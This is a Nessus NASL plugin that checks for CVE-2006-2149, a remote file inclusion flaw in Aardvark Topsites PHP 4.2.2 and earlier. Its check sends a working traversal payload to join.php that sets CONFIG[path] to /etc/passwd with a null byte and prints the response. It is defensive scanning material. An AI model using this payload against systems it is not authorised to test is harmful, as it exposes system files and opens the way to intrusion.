#
# Script Written By Ferdy Riphagen 
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory / discovered by :
# http://milw0rm.com/exploits/1732
# 

if (description) {
 script_id(200005); 
 script_version("$Revision: 1.0 $");

 script_cve_id("CVE-2006-2149");
 if (defined_func("script_xref")) {
  script_xref(name:"OSVDB", value:"25158");
 }

 name["english"] = "Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability";
 script_name(english:name["english"]);
 desc["english"] = "
Synopsis :

The remote system contains a PHP application that is prone to
remote file inclusions attacks.

Description :

Aardvark Topsites PHP is installed on the remote host. It is
a open source Toplist management system written in PHP.

The application does not sanitize user-supplied input to
the 'CONFIG[PATH]' variable in some PHP files. This allows
an attacker to include arbitrary files from remote systems, and
execute them with privileges under which the webserver operates.

The flaw is exploitable if PHP's 'register_globals' is set to on.

See also :

http://secunia.com/advisories/19911/
http://www.aardvarktopsitesphp.com/forums/viewtopic.php?t=4301

Solution :

Disable PHP's 'register_globals' or upgrade to the latest release.

Risk factor :

Medium / CVSS Base Score : 6 
(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)";
 script_description(english:desc["english"]);
 summary["english"] = "Checks for a file include in Aardvark Topsites less or equal to 4.2.2";
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");

 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

if (thorough_tests) dirs = make_list("/topsites", "/aardvarktopsites", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
 res = http_get_cache(item:string(dir, "/index.php"), port:port); 
 if(res == NULL) exit(0);

 if (egrep(pattern:"Powered By <a href[^>]+>Aardvark Topsites PHP<", string:res)) {
  uri = "FORM[url]=1&CONFIG[captcha]=1&CONFIG[path]=";
  lfile = "/etc/passwd";

  req = http_get(item:string(dir, "/sources/join.php?", uri, lfile, "%00"), port:port);
  recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
  display(recv);
  if (recv == NULL) exit(0);

  if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv) ||
     egrep(pattern:"Warning.+main\(/etc/passwd\\0\/.+failed to open stream", string:recv)) { 
   security_warning(port);
   exit(0);
  } 
 }
}
